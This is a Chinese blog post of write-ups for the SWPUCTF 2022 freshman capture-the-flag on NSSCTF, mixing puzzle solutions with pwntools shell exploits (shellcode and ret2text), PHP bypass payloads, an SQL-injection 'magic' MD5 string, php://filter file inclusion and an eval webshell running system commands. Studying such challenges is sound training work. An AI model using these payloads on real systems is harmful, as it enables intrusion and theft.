SWPUCTF 2022 新生赛(更新中)

已于 2024-05-23 11:29:03 修改
阅读量587 收藏 5
点赞数 3
文章标签: 网络安全
于 2024-03-25 16:36:49 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46631585/article/details/136837919
版权

在线练习地址icon-default.png?t=N7T8https://www.nssctf.cn/problem/sheet/14364

Crack Me

decompressing in different ways

两个文件都是伪加密,改压缩源文件目录区全局方式位标记

50 4B 01 02 3F 00 14 00 09 00
                         ↓
50 4B 01 02 3F 00 14 00 00 00

解压得到的两个文件完全一致,都是真加密

爆破得 8 位密码 23617894

NSSCTF{a80e8ac7-2f4a-418e-b81e-a9e15c3c0d28}

Capture!

I Hide Something in pixel

 010 里显示 CRC 异常,但是 CRC 校验数据正常,手动改宽高

TlNTQ1RGezNlMzgyNDk0LTMzNjMt
Base64↓
NSSCTF{3e382494-3363-
zsteg -a Capture\!.png

0nMwADMyEzYhJDNyATLxYjMh1CZlFTM
倒序↓
MTFlZC1hMjYxLTAyNDJhYzEyMDAwMn0
Base64↓
11ed-a261-0242ac120002}

NSSCTF{3e382494-3363-11ed-a261-0242ac120002}

Cycle Again

Two different types also similar

Last.png 图片宽度和高度为:0*0,CRC 校验 PNG 宽度和高度应为:2048*1152

NSSCTF{41d769db-

压缩包里都是 4 字节文本,CRC 爆破

NSSCTF{41d769db-9f5d-455e-a458-8012ba3660f3}

Coffee Please

Could you give me a cup of coffee in office?

NSSCTF{8ff8a53a-

ef86e8c84432}

剩下 word 文件内容不直观,但是本质都是 zip 文件,改后缀解压,源码里找

9378-4e78-b54a

NSSCTF{8ff8a53a-9378-4e78-b54a-ef86e8c84432}

Convert Something

Two ways to hide in text

Base64 隐写

NSSCTF{e16bc777-0d4a-4b74

 其中 285 行出现零宽字符隐写

-92b4-404bc0320da4}

NSSCTF{e16bc777-0d4a-4b74-92b4-404bc0320da4}

Does your nc work?

速来签到

直接 nc,在 /nss/ctf/ 目录下有 flag

Integer Overflow(lib2c 待解)

Pwn the world

 main 函数如下

overflow 函数如下 

choice1 函数如下 

shellcode?

 main 函数如下

使用 mmap 函数在内存地址 0x30303000 处分配 4096 个字节的内存空间,并将其设置为可读、可写和可执行

使用 read 函数从标准输入中读取 100 个字节的数据,并将其写入到之前分配的内存空间中

最后调用内存地址 0x30303000 中的内容

基础 ret2shellcode 类型

from pwn import *
context(log_level='debug',arch='amd64', os='linux')
p = remote('node5.anna.nssctf.cn', 28184)
payload = "\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\x6a\x3b\x58\x99\x0f\x05"
# 或者 payload = asm(shellcraft.sh())
p.sendline(payload)
p.interactive()

善哉善哉

善斋善哉,出题人以慈悲为怀

 套娃达咩.jpg 文件尾部有摩斯电码

--..-.--.--..../-..----.-.--.--/--..--.----..../--------...--.-./-...-.-.-----.../-..-.--.-.---.../-.-....---..---/-..-.--..-..--.-/-..-.-.--.-..--./-.-.-....----.-/-...-.-.-----.../-..-.-.--.-..--./-..-.--..-....../--..-...--.-..-/-..-.--.-.---.../-.-....---..---/-------..----.-/-....-.--.-.-..-/-..-.-.--.-..--./-.-.--.-.-..-../-..-.--..-..--.-/--..-.--.-.----/-.-.-..-.-..-../-..--.......-.../-..-.-.--.-..--./-.....-..---..-./-.-.--....--.-./-.-.--......---/-.-..-------.--/-..-.-.--.-..--./-.--..-..--.---/-.-.-.--.....--/-.-.-..--...--./-.-.--.-.--.-../-.-.-....--.--./-.....-----.-..-/-.....-.---..-.-/-.-.--......---/-.........-.-.../-.-.-..-..-..-./-..-.-.--.-..--./--....-....--.-/-..-.-.--.-..--./-.-.--.--..-..-/-.........-.-.../--...-..-....../-.-.--.-.-..-../-..-.-.--.-..--./-.-.--......---/-..-.-.--.-..--./-..-.--..-..--.-/-..-.--..-....../-.-..-------.--/--------....-.-/-.--.---.-...--/-.-.-....----.-/---.---..-----./-..-.--...------/--....-....--.-/-.....-----.-..-/-..-------.---./-.-------....--/-..-.--..-..--.-/-.-..-------.--/-..-.--..-....../-.-.--.-.-..-../-.-.-....----.-/-....---...---../-.-.-....--.--./--..-.--.-.----/-..-.-.--.-..--./-.-.--....--.-./--....-....--.-/-.-.-....----.-/-.....-.---..-.-/-.--.---.-...--/-.-.-..--...--./-.....-..---..-./-.--....-.----./-.-.--.--..-..-/-..----....----/-.-.--......---/--....-....--.-/-..-.--..-..--.-/-.-.--......---/-.-.-....----.-/-..-.-.---..--.-/-.-...-.-.---../-.-.-.--.----../-.--..--.....-.

把 / 换成空格解码↓

新佛曰:諸隸僧降閦吽諸閦陀摩隸僧缽薩閦嚤降斯咤須閦色嘚嘇叻閦夷喃哆嚴吶菩若嘇耨咒閦愍閦囉耨所嚤閦嘇閦降陀叻羅宣吽眾阿愍菩修心降叻陀嚤吽蜜吶斯閦嘚愍吽若宣哆色塞囉伏嘇愍降嘇吽闍兜喼如

新佛曰解码↓

施主,此次前来,不知有何贵干?

EXIF 信息(备注)里提示 MD5 加密,以 755 开头

flag{7551772a99379ed0ae6015a470c1e335}

有手就行的栈溢出

不正常的Backdoor

 main 函数如下

overflow 函数如下,get 函数存在溢出

gift 函数里有假后门 

 fun 函数里有真后门

后门地址 0x401257

基础 ret2text 类型

from pwn import *
context(log_level='debug',arch='amd64', os='linux')
p = remote('node5.anna.nssctf.cn', 28720)
system_bin_sh = 0x401257
payload = b'a'*(0x20+8) + p64(system_bin_sh)
p.sendline(payload)
p.interactive()

funny_web

听说有人夹带私货

登录跳转 NSS.php,弹窗如下 

 即用户名为 NSS

这个经查询是 2122693401,登录成功题目如下

<?php
error_reporting(0);
header("Content-Type: text/html;charset=utf-8");
highlight_file(__FILE__);
include('flag.php');
if (isset($_GET['num'])) {
    $num = $_GET['num'];
    if ($num != '12345') {
        if (intval($num) == '12345') {
            echo $FLAG;
        }
    } else {
        echo "这为何相等又不相等";
    }
}

intval 函数将数字字符转为整数,用数字以外的字符拼接绕过

?num=12345@

奇妙的MD5

一串奇妙的字符串

ffifdyop 是注入的万能密码,配合 md5(string,raw) 出现

经过 md5 加密后:276f722736c95d99e921722cf9ed621c

再转换为字符串:'or'6<乱码> 即 'or'66�]��!r,��b

同效果的还有 129581926211651571912466741651878684928

右键源代码里注释如下

<!--
$x= $GET['x'];
$y = $_GET['y'];
if($x != $y && md5($x) == md5($y)){
    ;
-->

 绕过弱类型比较,MD5 不能加密数组,会返回 null

?x[]=1&y[]=2

 跳转题目如下,数组也可以绕过强比较

<?php
error_reporting(0);
include "flag.php";
highlight_file(__FILE__);
if($_POST['wqh']!==$_POST['dsy']&&md5($_POST['wqh'])===md5($_POST['dsy'])){
    echo $FLAG;
}
wqh[]=1&dsy[]=2

where_am_i

你猜我要你输什么

 OSINT,题有点老,现在好像电话改了

02886112888

ez_ez_php

<?php
error_reporting(0);
if (isset($_GET['file'])) {
    if ( substr($_GET["file"], 0, 3) === "php" ) {
        echo "Nice!!!";
        include($_GET["file"]);
    } 
    else {
        echo "Hacker!!";
    }
}else {
    highlight_file(__FILE__);
}
//flag.php

substr 函数会获取前 3 个字符,PHP 伪协议

?file=php://filter/resource=flag.php

回显提示在 flag 文件里

?file=php://filter/resource=flag

webdog1__start

年轻的webdog哦,如果连这关都创不过还是去卷pwn和re吧

源代码里有注释如下

<!--
if (isset($_GET['web']))
{
    $first=$_GET['web'];
    if ($first==md5($first)) 
     
-->

利用特殊字符串,在解析弱比较时 0e215962017 会被截断解析为 0,且 MD5 加密后为 0e291242476940776845150308577824 同样会被截断解析为 0

?web=0e215962017

源代码里提示 bot,尝试 robots.txt 

 在 f14g.php 的响应头里提示 F1l1l1l1l1lag.php

 题目如下


<?php
error_reporting(0);
highlight_file(__FILE__);
if (isset($_GET['get'])){
    $get=$_GET['get'];
    if(!strstr($get," ")){
        $get = str_ireplace("flag", " ", $get);
        
        if (strlen($get)>18){
            die("This is too long.");
            }
            
            else{
                eval($get);
          } 
    }else {
        die("nonono"); 
    }
}
?>

既然只限制了 flag 字符串和空格,那不如写一句话木马直接绕过

?get=@eval($_GET[1]);&1=system('cat /f*');

Ez_upload

简单的文件上传

直接上传一句话木马提示后缀不能有 ph

HaKuN@
关注
  • 3
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[SWPUCTF 2021 新生]traditional
03-15
SWPUCTF 2021 新生的传统题目,我们看到了一道有趣的密码题目,它与八卦图和二进制数学有着紧密的联系。莱布尼茨是西方的二进制数学的发明者,他受到国的八卦图的启发,演绎并推论出了数学矩阵,最后创造了...
2016 SWPU CTF web1题目源码
10-31
2016 SWPU CTF web1题目源码
[SWPUCTF 2022 新生]All in Base&& 介绍base密码家族
2302_79861544的博客
12-30 665
特征:较Base64不使用数字0,大写字母O,大写字母I,小写字母i,以及符号+、/,无填充符号"="特征:由符号 、$、%、*、+、-、.、/、:,数字0-9,大写字母A-Z,组成,无填充符号"="特征:由+、/、数字0-9,大写字母A-Z、小写字母a-z组成,有填充符号"=",特征:由数字2-7,大写字母A-Z组成,有填充符号"=",不满5的倍数。解密后,得到的一堆乱七八糟的符号,就知道是用base85加密,于是再解。特征:由数字0-9,大写字母A-F组成,无填充符号"="还是base85,再解!
[SWPUCTF 2022 新生]部分web
2301_80470992的博客
02-13 953
分析题目这段 PHP 代码定义了一个名为lyh的类,并在其定义了一些属性和方法。然后,它使用函数来反序列化从 POST 请求接收到的数据,并最后使用函数高亮显示当前文件的源代码。类定义 (lyh$url$lt$lly$this->lt$a$a$this->lly代码执行流程lyh__destruct$lt$lly这个题目是一题很标准的反序列化构造链条得到以下payload=O:3:"lyh":3:{s:3:"url";s:2:"lt";s:3:"lly";s:2:"ls";
[SWPUCTF 2022 新生]android
最新发布
lzx13290757580的博客
04-21 159
先解压,改apk后缀为zip再次解压用dex2jar反编译得到jar文件,再用jd-gui查看即可得到flag。
SWPUCTF 2022 新生
2301_80593203的博客
02-20 438
得到以下payload=O:3:"lyh":3:{s:3:"url";s:3:"lly";以及这里有个wakeup的绕过,以及这里需要一个assert的函数不知道为啥要它,以及里边有一个md5的弱比较,绕过这三个就能够正常的。接着在另外给自己传参一个参数,在这个参数里做命令执行。接着cat /flag,得到flag.在根目录下边找到flag的文件。这题打开是一串多多的pop链。这个题目是一题很标准的。接着就能成功命令执行了。
swpuctf新生
2201_75843485的博客
02-16 850
RCERCE漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统rce简单来说就是远程漏洞。system()就是调用(DOS)系统命令(和shell命令)直接将 $a 赋值为 system ,也就是将 $this->lt 赋值为 system ,那么 $this->lly 就可以赋值成任意命令,造成 RCE。将$this->lly赋值成cat/flag就能查看flag文件输出内容是这个将nss反序列换,所以使nss等于这个,就可以查看flag。
2022 SWPU NSS新生|MISC知识点
zerorzeror的博客
10-25 993
2022 SWPU NSS新生|MISC知识点
[SWPUCTF 2022 新生] 刷题记录
rev1ve的博客
08-12 744
SWPUCTF 2022 新生 若调用类的静态方法,则需要传递一个数组作为第一个参数。数组的第一个元素是类名,第二个元素是要调用的静态方法名。F12,web开发者都被办了,尝试查看源代码,得到。跟第二关相比变成了强等于,直接数组绕过。打开题目,发现加到19就会变成-20。很明显是使用sql注入的万能密码。一看就是base64加密,直接解码。打开题目,第一关提示在http头。分析一下,提示POST传参,出现。分析一下,进行反序列化时,会让。然后执行函数,且参数值为。绕过后,得到第三关源代码。
ctf逆向解题——re1-附件资源
03-05
ctf逆向解题——re1-附件资源
2016 SWPU CTF web4
10-31
2016 SWPU CTF web4 题目的源码压缩包,压缩包地址是:http://web4.08067.me/web/web.zip,如果服务器关了就只有这里有了
error message_errormessage_
10-04
这个函数的目的是拥有一个独立于设备的;误差传递函数。报告错误信息;如果小部件是,则使用DIALOG_MESSAGE向用户发送;支持和消息,否则
2022 SWPUCTF Web+Crypto方向wp
ph0ebus的博客
10-29 6246
简单阅读代码可以发现,__wakeup()方法会首先被激活,覆盖变量的值使flag不能被回显,因此这里需要绕过__wakeup()方法,__wakeup函数是在php在使用反序列化函数unserialize()时,会自动调用的函数。然后想办法读取文件,cat tac tail都被过滤了,那我们还可以利用nl查看文件内容,这里发现数字被过滤了,我们想到了*来匹配,但是*也被过滤了,尽管如此,我们还可以用?但是里面没有看到类似flag的东西,那就进入根目录看看,但是空格被过滤了,可以用${IFS}绕过。
虎符CTF2022 —shellcode
qq_54894802的博客
09-21 208
我们进行动态调试,先准备手动脱壳的,脱的时候发现居然有反调试,准备动态调试将反调试的patch但是发现很难脱,脱了半天还在循环,可能太菜的原因(T _ T)。或者记下这个地址,我们使用IDA的附加调试,将IDA附加到程序上,因为程序运行到了打印字符 了,所以壳肯定是解开了。将程序放入X32DBGz进行分析,我们按F9运行几次,我们就可以运行到我们的OPE之了。进入之后,我们进行简单的分析可以发现,这个函数实现的是base64加密。看分析还是比较简单,就是将原本程序里面的两端提示,进行加密的。
2022 SWPU新生&HNCTF web部分题目
weixin_63231007的博客
11-02 3175
SWPU在start.php 界面抓个包,发包得到:F1l1l1l1l1lag.phpThinkPHP V5 rce 漏洞在网上可以找到现成的payload替换whoami命令为我们要执行的命令即可反序列化构造 assert(eval($_POST[1]));cat /flag即可ez_1zpop之后把属性改大一位,绕过__wakeup()函数numgame查看js源码发现了NsScTf.php。
SWPUCTF2022 校内道部分 wp
yjprolus的博客
10-26 1276
SWPUCTF2022 wp
unctf2022 md5-1 (python实现MD5碰撞)
weixin_47623063的博客
11-23 1024
unctf2022 MD5-1 (python实现MD5碰撞)
[SWPUCTF 2022 新生]奇妙的MD5
m0_73612768的博客
01-16 715
奇妙的字符串;线索在源码里;MD5 弱比较;MD5 强比较;
[SWPUCTF 2021 新生]hardrce
07-25
\[SWPUCTF 2021 新生\]hardrce是一个比的题目,它是一个PHP脚本。这个脚本首先会检查用户传入的参数wllm是否存在,然后会对wllm进行一系列的过滤操作。过滤操作包括去除空格、制表符、回车、换行等特殊字符,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值